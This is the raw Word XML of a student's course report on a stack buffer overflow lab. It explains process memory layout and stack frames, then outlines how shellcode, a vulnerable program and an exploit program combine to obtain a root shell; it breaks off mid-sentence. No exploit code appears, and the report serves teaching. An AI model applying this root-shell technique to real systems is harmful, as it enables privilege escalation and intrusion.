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916DF" w14:textId="30E0C9B9" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C674A3D" wp14:editId="05BD1C8E">
            <wp:extent cx="1150620" cy="1211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50620" cy="1211580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7841E" w14:textId="35B47C58" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E09474C" w14:textId="624D1599" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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Attack Project 1 CIS 544 Fall 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500DF17" w14:textId="77777777" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B3CD6" w14:textId="42427FF3" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Prof. Anys Bacha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33604D" w14:textId="2A022757" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FAC0561" w14:textId="71E1D243" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitted by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20450C" w14:textId="5944EA90" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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Manjula Dhondiba Khot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E78728" w14:textId="3830E393" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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UMID: 73764162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AEE739" w14:textId="7AE93B76" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609B2230" w14:textId="3A7B8340" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806FB" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68130300" w14:textId="083F06AD" w:rsidR="008806FB" w:rsidRPr="000941B1" w:rsidRDefault="008806F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A</w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BSTRACT</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A3420C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer overflows are a common form of security vulnerability with programs written in C/C++. </w:t>
      </w:r>
      <w:r w:rsidR="00CF716E" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">These languages are still popular and used a lot in systems such as Embedded systems and open source software. </w:t>
      </w:r>
      <w:r w:rsidR="00667EC0" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A buffer overflow </w:t>
      </w:r>
      <w:r w:rsidR="00186184" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>occurs</w:t>
      </w:r>
      <w:r w:rsidR="00667EC0" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> when a running program attempts to write data outside the memory buffer not intended to store this data. When data is written outside the buffer, the running program may crash but an attacker may easily exploit this vulnerability and manipulate the program to their advantage. This leads to buffer overflow attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528F95CD" w14:textId="6972BB67" w:rsidR="00667EC0" w:rsidRPr="000941B1" w:rsidRDefault="00667EC0" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A55731" w14:textId="77777777" w:rsidR="0056636B" w:rsidRPr="000941B1" w:rsidRDefault="00553AAD"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S</w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UMMARY</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD56B5" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A210F17" w14:textId="00F42B0D"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To fully understand how buffer overﬂow attacks work, we need to understand how the memory is arranged inside a process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59BFDE" w14:textId="24236CE5"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When a program runs, it needs memory space to store data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E154336"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12A4CC3D" w14:textId="0E2B13FD"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For a typical C program, its memory is divided into ﬁve segments: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C0B76" w14:textId="17B3022F"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Text segment: stores the executable code of the program. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496789EF"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35909CC3" w14:textId="4131A26B"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Data segment: stores static/global variables that are initialized by the programmer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830BDD6"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07DAB817" w14:textId="2F554A22"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BSS segment: stores uninitialized static/global variables. This segment will be ﬁlled with zeros by the operating system, so all the uninitialized variables are initialized with zeros. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7609CE31"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6CD4F643" w14:textId="713837D1"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lastRenderedPageBreak/>
        <w:t>• Heap: The heap is used to provide space for dynamic memory allocation. This area is managed by malloc, calloc, realloc, free, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C23D3F"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640FF54B" w14:textId="7AB45826"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Stack: The stack is used for storing local variables deﬁned inside functions, as well as storing data related to function calls, such as return address, arguments, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4ECB60" w14:textId="77777777" w:rsidR="0056636B" w:rsidRPr="000941B1" w:rsidRDefault="0056636B" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E114AE" w14:textId="53423096" w:rsidR="00477170" w:rsidRPr="000941B1" w:rsidRDefault="00AD56B5"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When a C program is run</w:t>
      </w:r>
      <w:r w:rsidR="00477170" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209607D4" w14:textId="0185F6F0" w:rsidR="00477170" w:rsidRPr="000941B1" w:rsidRDefault="00477170" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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All the arguments are pushed on the stack from right to left before running the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F170E" w14:textId="1906774E" w:rsidR="00477170" w:rsidRPr="000941B1" w:rsidRDefault="00477170" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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address of the next instruction i.e. the Return Address is pushed on to the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC2BB3" w14:textId="36EC6B44" w:rsidR="00477170" w:rsidRPr="000941B1" w:rsidRDefault="00477170" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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old ebp of stack is pushed on the stack and the new stack top is moved into the ebp as the new base pointer</w:t>
      </w:r>
      <w:r w:rsidR="0056636B" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBECCE" w14:textId="2A0E0B9D" w:rsidR="0056636B" w:rsidRPr="000941B1" w:rsidRDefault="00F17B80" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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After the program is executed, the program control jumps to the return address in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E04259" w14:textId="135EF88C" w:rsidR="00F17B80" w:rsidRPr="000941B1" w:rsidRDefault="00F17B80" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D71BE51" w14:textId="4F9F10C0" w:rsidR="00F17B80" w:rsidRPr="000941B1" w:rsidRDefault="00F17B80" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24528219" w14:textId="0C55C596" w:rsidR="00F17B80" w:rsidRPr="000941B1" w:rsidRDefault="00F17B80"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In this Attack project, we demonstrate a buffer overflow attack using a vulnerable program which executes code similar to “exec(sh)” to get to a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295524AF" w14:textId="77777777" w:rsidR="00477170" w:rsidRPr="000941B1" w:rsidRDefault="00477170" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5C8A8C" w14:textId="253BF101" w:rsidR="00AD56B5" w:rsidRPr="000941B1" w:rsidRDefault="00AD56B5" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07998C88" w14:textId="179198EF" w:rsidR="00AD56B5" w:rsidRPr="000941B1" w:rsidRDefault="00AD56B5"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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47A4B734" wp14:editId="463BF8C6">
            <wp:extent cx="2537460" cy="307856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98329" cy="3152416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F615B0" w14:textId="77777777" w:rsidR="00AD56B5" w:rsidRPr="000941B1" w:rsidRDefault="00AD56B5" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366F842C" w14:textId="1B728273" w:rsidR="00833FC9" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52"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The above figure summarizes our Attack project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51260317" w14:textId="3A515B54" w:rsidR="00E32B1F" w:rsidRPr="000941B1" w:rsidRDefault="00E32B1F" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E29746A" w14:textId="30B95023" w:rsidR="00E32B1F" w:rsidRPr="000941B1" w:rsidRDefault="00E32B1F"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lastRenderedPageBreak/>
        <w:t>shellcode.c</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: This is an example program which launches a new shell. The program passes shellcode in assembly version which launches a new shell. Once the program is compiled and run, it launches a new shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5291C" w14:textId="1A270325" w:rsidR="00A10DF8" w:rsidRPr="000941B1" w:rsidRDefault="00A10DF8" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B07276" w14:textId="1F03C6D1" w:rsidR="00A10DF8" w:rsidRPr="000941B1" w:rsidRDefault="003A4026"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 xml:space="preserve">Passing the </w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: In order to perform our attack, we need</w:t>
      </w:r>
      <w:r w:rsidR="00A10DF8" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> that has to be loaded into the memory. We use a shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00A10DF8" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in assembly version which </w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>launches a new root shell</w:t>
      </w:r>
      <w:r w:rsidR="00553AAD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. We pass this </w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode into our vulnerable program using the exploit.c. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D732CE" w14:textId="28C4C528" w:rsidR="009B249C" w:rsidRPr="000941B1" w:rsidRDefault="009B249C" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209BA83F" w14:textId="3A792B64" w:rsidR="00833FC9" w:rsidRPr="000941B1" w:rsidRDefault="003A4026"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 xml:space="preserve">Vulnerable program </w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
      <w:r w:rsidR="00833FC9" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009B249C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The vulnerable program used in this attack is stack.c. This vulnerability is exploited using exploit.c</w:t>
      </w:r>
      <w:r w:rsidR="00D82E4D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> which</w:t>
      </w:r>
      <w:r w:rsidR="009B249C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates the contents of a bad </w:t>
      </w:r>
      <w:r w:rsidR="004E607D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
